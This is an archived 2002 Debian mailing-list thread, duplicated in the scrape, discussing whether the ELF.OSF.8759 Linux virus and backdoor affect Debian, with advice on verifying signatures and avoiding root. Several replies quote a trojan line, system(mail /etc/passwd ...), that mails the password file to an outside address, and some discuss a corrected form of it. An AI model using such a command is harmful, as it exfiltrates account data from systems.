Re: does virus ELF.OSF.8759 affect debian?
On Thu, Apr 18, 2002 at 11:02:12AM +1200, Tim Nicholas wrote: I think he is saying that it should be somthing more like system(mail [EMAIL PROTECTED] /etc/passwd); But since i dont really know c, you might not be able to use '' in system calls... it seems likey though. The previous version would try to email user /etc/passwd. For the record, system(3)'s manpage states: system() executes a command specified in string by calling /bin/sh -c string The string you pass to system() is given as a single argument to the shell, so you can do anything and everything. I think we all get the point :) -- #define X(x,y) x##y Peter Cordes ; e-mail: X([EMAIL PROTECTED] , ns.ca) The gods confound the man who first found out how to distinguish the hours! Confound him, too, who in this place set up a sundial, to cut and hack my day so wretchedly into small pieces! -- Plautus, 200 BCE -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: does virus ELF.OSF.8759 affect debian?
On Wed, Apr 17, 2002 at 12:13:46PM +0300, Jussi Ekholm wrote: Anne Carasik [EMAIL PROTECTED] wrote: Compile from source is a good idea too. It's amazing what you can find in the source. I found a couple of stupid Trojans that way. system(mail /etc/passwd [EMAIL PROTECTED]); Oh shit, that's evil. Where did you manage a software including this kind of source code in first place? Don't say freshmeat.net! Or sourceforge.net... I'm glad you were able to detect this and not run the software. I can't remember, other than some obviously suspect code. It was an ssh trojan, if I remember correctly. Big sigh, indeed. I hate these script kiddies, crackers and people, who only does harm to other people online. Was it a take-over of an IRC channel, breaking to someone's system or whatever. I just hate these people. I've never seen computer, internet connection and everything related as a tools to cause harm and destruction. It's beyond me, what satisfaction does these persons get... I don't think they have anything better to do (at least the script kiddies). Some groups, like in the Middle East and China, feel that they have a sudden interest in attacking US sites. However, I'm sure there are other groups attacking the Middle East and China as well. You should see some of the stupid stuff script kiddies leave on the systems--they don't even change the mtime or the logs, not to mention leave the code behind with URLs in it. -Anne -- .-.__.``. Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' [EMAIL PROTECTED] (O/ O) \-' ` -==.', Center for Advanced Computing Research ~`~~ msg06385/pgp0.pgp Description: PGP signature
Re: does virus ELF.OSF.8759 affect debian?
On Wed, Apr 17, 2002 at 03:31:17PM -0700, Anne Carasik wrote: On Wed, Apr 17, 2002 at 05:06:03PM -0500, Bryan Andersen wrote: Compile from source is a good idea too. It's amazing what you can find in the source. I found a couple of stupid Trojans that way. system(mail /etc/passwd [EMAIL PROTECTED]); Yeh, and it's buggy too Take a close look at what really happens. I'm sure it is. [EMAIL PROTECTED] doesn't exist. ;) Seriously, I know it is. The other thing is, I use shadow most of the time. Still, the username information is never a good thing to share. I think he is saying that it should be somthing more like system(mail [EMAIL PROTECTED] /etc/passwd); But since i dont really know c, you might not be able to use '' in system calls... it seems likey though. The previous version would try to email user /etc/passwd. Tim -- Tim Nicholas || Cilix Email: [EMAIL PROTECTED]|| ICQ# 15869961 http://tim.nicholas.net.nz/ || Dunedin, New Zealand Grow up, Larry. You give me too much credit. - Linus Torvalds -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: does virus ELF.OSF.8759 affect debian?
Anne Carasik [EMAIL PROTECTED] wrote: Compile from source is a good idea too. It's amazing what you can find in the source. I found a couple of stupid Trojans that way. system(mail /etc/passwd [EMAIL PROTECTED]); Oh shit, that's evil. Where did you manage a software including this kind of source code in first place? Don't say freshmeat.net! Or sourceforge.net... I'm glad you were able to detect this and not run the software. *sigh* Big sigh, indeed. I hate these script kiddies, crackers and people, who only does harm to other people online. Was it a take-over of an IRC channel, breaking to someone's system or whatever. I just hate these people. I've never seen computer, internet connection and everything related as a tools to cause harm and destruction. It's beyond me, what satisfaction does these persons get... -- Jussi Ekholm [EMAIL PROTECTED] | registered Linux user #269376 http://erppimaa.cjb.net/~ekhowl/ | UIN (ICQ):156057281 ekh @ IRCNet | GnuPG Public Key ID: 1410081E pgp3TuoOkuzuS.pgp Description: PGP signature
Re: does virus ELF.OSF.8759 affect debian?
Anne Carasik wrote: On Wed, Apr 10, 2002 at 10:52:38AM -0700, Brandon High wrote: And another reason not to run as root... Compile from source is a good idea too. It's amazing what you can find in the source. I found a couple of stupid Trojans that way. system(mail /etc/passwd [EMAIL PROTECTED]); Yeh, and it's buggy too Take a close look at what really happens. -- | Bryan Andersen | [EMAIL PROTECTED] | http://www.nerdvest.com | | Buzzwords are like annoying little flies that deserve to be swatted. | | Linux, the OS Microsoft doesn't want you to know about.. | | -Bryan Andersen| -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: does virus ELF.OSF.8759 affect debian?
On Wed, Apr 17, 2002 at 12:13:46PM +0300, Jussi Ekholm wrote: Anne Carasik [EMAIL PROTECTED] wrote: Compile from source is a good idea too. It's amazing what you can find in the source. I found a couple of stupid Trojans that way. system(mail /etc/passwd [EMAIL PROTECTED]); Oh shit, that's evil. Where did you manage a software including this kind of source code in first place? Don't say freshmeat.net! Or sourceforge.net... I'm glad you were able to detect this and not run the software. I can't remember, other than some obviously suspect code. It was an ssh trojan, if I remember correctly. Big sigh, indeed. I hate these script kiddies, crackers and people, who only does harm to other people online. Was it a take-over of an IRC channel, breaking to someone's system or whatever. I just hate these people. I've never seen computer, internet connection and everything related as a tools to cause harm and destruction. It's beyond me, what satisfaction does these persons get... I don't think they have anything better to do (at least the script kiddies). Some groups, like in the Middle East and China, feel that they have a sudden interest in attacking US sites. However, I'm sure there are other groups attacking the Middle East and China as well. You should see some of the stupid stuff script kiddies leave on the systems--they don't even change the mtime or the logs, not to mention leave the code behind with URLs in it. -Anne -- .-.__.``. Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' [EMAIL PROTECTED] (O/ O) \-' ` -==.', Center for Advanced Computing Research ~`~~ pgpfYfAp4Cex0.pgp Description: PGP signature
Re: does virus ELF.OSF.8759 affect debian?
On Wed, Apr 17, 2002 at 05:06:03PM -0500, Bryan Andersen wrote: Compile from source is a good idea too. It's amazing what you can find in the source. I found a couple of stupid Trojans that way. system(mail /etc/passwd [EMAIL PROTECTED]); Yeh, and it's buggy too Take a close look at what really happens. I'm sure it is. [EMAIL PROTECTED] doesn't exist. ;) Seriously, I know it is. The other thing is, I use shadow most of the time. Still, the username information is never a good thing to share. -Anne -- .-.__.``. Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' [EMAIL PROTECTED] (O/ O) \-' ` -==.', Center for Advanced Computing Research ~`~~ pgpWnq6XAr2NO.pgp Description: PGP signature
Re: does virus ELF.OSF.8759 affect debian?
On Wed, Apr 17, 2002 at 03:31:17PM -0700, Anne Carasik wrote: On Wed, Apr 17, 2002 at 05:06:03PM -0500, Bryan Andersen wrote: Compile from source is a good idea too. It's amazing what you can find in the source. I found a couple of stupid Trojans that way. system(mail /etc/passwd [EMAIL PROTECTED]); Yeh, and it's buggy too Take a close look at what really happens. I'm sure it is. [EMAIL PROTECTED] doesn't exist. ;) Seriously, I know it is. The other thing is, I use shadow most of the time. Still, the username information is never a good thing to share. I think he is saying that it should be somthing more like system(mail [EMAIL PROTECTED] /etc/passwd); But since i dont really know c, you might not be able to use '' in system calls... it seems likey though. The previous version would try to email user /etc/passwd. Tim -- Tim Nicholas || Cilix Email: [EMAIL PROTECTED]|| ICQ# 15869961 http://tim.nicholas.net.nz/ || Dunedin, New Zealand Grow up, Larry. You give me too much credit. - Linus Torvalds -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
does virus ELF.OSF.8759 affect debian?
Hi there! I've read a srtange info at http://www3.ca.com/Virus/Virus.asp?ID=11513 is it true? can it infect my debian systems? (woody, sid, potato)? how? thanks ELF.OSF.8759 Alias: Linux.Osf.8759 Category: UNIX/Linux Type: Virus Wild: Destructiveness: Pervasiveness: CHARACTERISTICS OSF.8759 is a Linux virus infecting ELF executable programs. OSF consists of two quite distinct parts: a viral part and a backdoor part. The virus checks if its code is executed under the debugger and if so, it skips the file infection routine altogether. This routine is also avoided if the infected file is executed from the /proc or /dev directories. Otherwise, it infects up to 201 files in the current directory as well as up to 201 files in the /bin directory. The virus avoids infecting the ?ps? program (and all programs with names ending with the string ?ps?). Infected files increase their size by 8759 bytes. The virus marks all infected programs by setting a value of the byte at offset 0x0A to 2. The backdoor procedure establishes a server listening on port 3049 (or higher). Depending on the contents of packets received from a client OSF may present a remote user with an interactive shell or execute commands on a local system using the syntax: ?/bin/sh ?c command?. - Narancs v1 IT Security Administrator Warning: This is a really short .sig! Vigyazat: ez egy nagyon rovid szig! -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: does virus ELF.OSF.8759 affect debian?
On Wed, Apr 10, 2002 at 06:24:01PM +0200, Narancs v1 wrote: Hi there! I've read a srtange info at http://www3.ca.com/Virus/Virus.asp?ID=11513 is it true? can it infect my debian systems? (woody, sid, potato)? how? If you run an infected file - yes. Otherwise - i don't think so (they don't say if it exploits any vulnerabilities other than user's stupidity/ignorance). Basically, if you run binaries from an unsafe source, you get what you deserve. Marcin -- Marcin Owsiany [EMAIL PROTECTED] http://marcin.owsiany.pl/ GnuPG: 1024D/60F41216 FE67 DA2D 0ACA FC5E 3F75 D6F6 3A0D 8AA0 60F4 1216 -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: does virus ELF.OSF.8759 affect debian?
On Wed, Apr 10, 2002 at 07:46:22PM +0200, Marcin Owsiany wrote: On Wed, Apr 10, 2002 at 06:24:01PM +0200, Narancs v1 wrote: Hi there! I've read a srtange info at http://www3.ca.com/Virus/Virus.asp?ID=11513 is it true? can it infect my debian systems? (woody, sid, potato)? how? If you run an infected file - yes. Otherwise - i don't think so (they don't say if it exploits any vulnerabilities other than user's stupidity/ignorance). Basically, if you run binaries from an unsafe source, you get what you deserve. And another reason not to run as root... -B -- Brandon High [EMAIL PROTECTED] '98 Kawi ZX-7R Wasabi, '98 Kawi EX500 Harlot, '94 BMW K75s Brick When approaching a four-way stop, the vehicle with the largest tires always has the right of way. msg06295/pgp0.pgp Description: PGP signature
Re: does virus ELF.OSF.8759 affect debian?
On Wed, Apr 10, 2002 at 10:52:38AM -0700, Brandon High wrote: And another reason not to run as root... Compile from source is a good idea too. It's amazing what you can find in the source. I found a couple of stupid Trojans that way. system(mail /etc/passwd [EMAIL PROTECTED]); *sigh* -Anne -- .-.__.``. Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' [EMAIL PROTECTED] (O/ O) \-' ` -==.', Center for Advanced Computing Research ~`~~ msg06296/pgp0.pgp Description: PGP signature
Re: does virus ELF.OSF.8759 affect debian?
wow, that's bad! where did you find that evil code? jmb At 02:44 PM 4/10/02 -0700, Anne Carasik wrote: On Wed, Apr 10, 2002 at 10:52:38AM -0700, Brandon High wrote: And another reason not to run as root... Compile from source is a good idea too. It's amazing what you can find in the source. I found a couple of stupid Trojans that way. system(mail /etc/passwd [EMAIL PROTECTED]); *sigh* -Anne -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: does virus ELF.OSF.8759 affect debian?
On Wed, Apr 10, 2002 at 05:46:24PM -0400, Dominique Fortier wrote: Basically, if you run binaries from an unsafe source, you get what you deserve. Man, I try to be a honnest individual, I hope I don't deserve something like that ! ..., Is there such a thing has a 100% safe source for binaries ? Check the PGP key (or GnuPG key) and the md5 checksum from the source (as long as you trust the source). Even trusted sources (like ftp.porcupine.org/pub/security) get hit with Trojan horses. Always check the digital signatures and the checksums! Debian does this when you do an apt-get, I believe. -Anne -- .-.__.``. Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' [EMAIL PROTECTED] (O/ O) \-' ` -==.', Center for Advanced Computing Research ~`~~ msg06299/pgp0.pgp Description: PGP signature
Re: does virus ELF.OSF.8759 affect debian?
On Wed, Apr 10, 2002 at 02:54:26PM -0700, Anne Carasik wrote: with Trojan horses. Always check the digital signatures and the checksums! Debian does this when you do an apt-get, I believe. I think there's support for it in later versions of apt-get, but not with the one included with Potato. -B -- Brandon High [EMAIL PROTECTED] '98 Kawi ZX-7R Wasabi, '98 Kawi EX500 Harlot, '94 BMW K75s Brick Speeling mistakes only bother people who are illiterate. msg06301/pgp0.pgp Description: PGP signature
does virus ELF.OSF.8759 affect debian?
Hi there! I've read a srtange info at http://www3.ca.com/Virus/Virus.asp?ID=11513 is it true? can it infect my debian systems? (woody, sid, potato)? how? thanks ELF.OSF.8759 Alias: Linux.Osf.8759 Category: UNIX/Linux Type: Virus Wild: Destructiveness: Pervasiveness: CHARACTERISTICS OSF.8759 is a Linux virus infecting ELF executable programs. OSF consists of two quite distinct parts: a viral part and a backdoor part. The virus checks if its code is executed under the debugger and if so, it skips the file infection routine altogether. This routine is also avoided if the infected file is executed from the /proc or /dev directories. Otherwise, it infects up to 201 files in the current directory as well as up to 201 files in the /bin directory. The virus avoids infecting the ?ps? program (and all programs with names ending with the string ?ps?). Infected files increase their size by 8759 bytes. The virus marks all infected programs by setting a value of the byte at offset 0x0A to 2. The backdoor procedure establishes a server listening on port 3049 (or higher). Depending on the contents of packets received from a client OSF may present a remote user with an interactive shell or execute commands on a local system using the syntax: ?/bin/sh ?c command?. - Narancs v1 IT Security Administrator Warning: This is a really short .sig! Vigyazat: ez egy nagyon rovid szig! -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: does virus ELF.OSF.8759 affect debian?
On Wed, Apr 10, 2002 at 06:24:01PM +0200, Narancs v1 wrote: Hi there! I've read a srtange info at http://www3.ca.com/Virus/Virus.asp?ID=11513 is it true? can it infect my debian systems? (woody, sid, potato)? how? If you run an infected file - yes. Otherwise - i don't think so (they don't say if it exploits any vulnerabilities other than user's stupidity/ignorance). Basically, if you run binaries from an unsafe source, you get what you deserve. Marcin -- Marcin Owsiany [EMAIL PROTECTED] http://marcin.owsiany.pl/ GnuPG: 1024D/60F41216 FE67 DA2D 0ACA FC5E 3F75 D6F6 3A0D 8AA0 60F4 1216 -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: does virus ELF.OSF.8759 affect debian?
On Wed, Apr 10, 2002 at 07:46:22PM +0200, Marcin Owsiany wrote: On Wed, Apr 10, 2002 at 06:24:01PM +0200, Narancs v1 wrote: Hi there! I've read a srtange info at http://www3.ca.com/Virus/Virus.asp?ID=11513 is it true? can it infect my debian systems? (woody, sid, potato)? how? If you run an infected file - yes. Otherwise - i don't think so (they don't say if it exploits any vulnerabilities other than user's stupidity/ignorance). Basically, if you run binaries from an unsafe source, you get what you deserve. And another reason not to run as root... -B -- Brandon High [EMAIL PROTECTED] '98 Kawi ZX-7R Wasabi, '98 Kawi EX500 Harlot, '94 BMW K75s Brick When approaching a four-way stop, the vehicle with the largest tires always has the right of way. pgp5X912gTrBH.pgp Description: PGP signature
Re: does virus ELF.OSF.8759 affect debian?
On Wed, Apr 10, 2002 at 10:52:38AM -0700, Brandon High wrote: And another reason not to run as root... Compile from source is a good idea too. It's amazing what you can find in the source. I found a couple of stupid Trojans that way. system(mail /etc/passwd [EMAIL PROTECTED]); *sigh* -Anne -- .-.__.``. Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' [EMAIL PROTECTED] (O/ O) \-' ` -==.', Center for Advanced Computing Research ~`~~ pgpbVsN8QcvSy.pgp Description: PGP signature
Re: does virus ELF.OSF.8759 affect debian?
On Wed, 2002-04-10 at 13:46, Marcin Owsiany wrote: On Wed, Apr 10, 2002 at 06:24:01PM +0200, Narancs v1 wrote: Hi there! I've read a srtange info at http://www3.ca.com/Virus/Virus.asp?ID=11513 is it true? can it infect my debian systems? (woody, sid, potato)? how? If you run an infected file - yes. Otherwise - i don't think so (they don't say if it exploits any vulnerabilities other than user's stupidity/ignorance). Basically, if you run binaries from an unsafe source, you get what you deserve. Man, I try to be a honnest individual, I hope I don't deserve something like that ! ..., Is there such a thing has a 100% safe source for binaries ? Marcin -- Marcin Owsiany [EMAIL PROTECTED] http://marcin.owsiany.pl/ GnuPG: 1024D/60F41216 FE67 DA2D 0ACA FC5E 3F75 D6F6 3A0D 8AA0 60F4 1216 -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED] -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: does virus ELF.OSF.8759 affect debian?
wow, that's bad! where did you find that evil code? jmb At 02:44 PM 4/10/02 -0700, Anne Carasik wrote: On Wed, Apr 10, 2002 at 10:52:38AM -0700, Brandon High wrote: And another reason not to run as root... Compile from source is a good idea too. It's amazing what you can find in the source. I found a couple of stupid Trojans that way. system(mail /etc/passwd [EMAIL PROTECTED]); *sigh* -Anne -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: does virus ELF.OSF.8759 affect debian?
On Wed, Apr 10, 2002 at 05:46:24PM -0400, Dominique Fortier wrote: Basically, if you run binaries from an unsafe source, you get what you deserve. Man, I try to be a honnest individual, I hope I don't deserve something like that ! ..., Is there such a thing has a 100% safe source for binaries ? Check the PGP key (or GnuPG key) and the md5 checksum from the source (as long as you trust the source). Even trusted sources (like ftp.porcupine.org/pub/security) get hit with Trojan horses. Always check the digital signatures and the checksums! Debian does this when you do an apt-get, I believe. -Anne -- .-.__.``. Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' [EMAIL PROTECTED] (O/ O) \-' ` -==.', Center for Advanced Computing Research ~`~~ pgpWJvL0nK50k.pgp Description: PGP signature
Re: does virus ELF.OSF.8759 affect debian?
On Wed, Apr 10, 2002 at 02:54:26PM -0700, Anne Carasik wrote: with Trojan horses. Always check the digital signatures and the checksums! Debian does this when you do an apt-get, I believe. I think there's support for it in later versions of apt-get, but not with the one included with Potato. -B -- Brandon High [EMAIL PROTECTED] '98 Kawi ZX-7R Wasabi, '98 Kawi EX500 Harlot, '94 BMW K75s Brick Speeling mistakes only bother people who are illiterate. pgpS8PSUGjEHI.pgp Description: PGP signature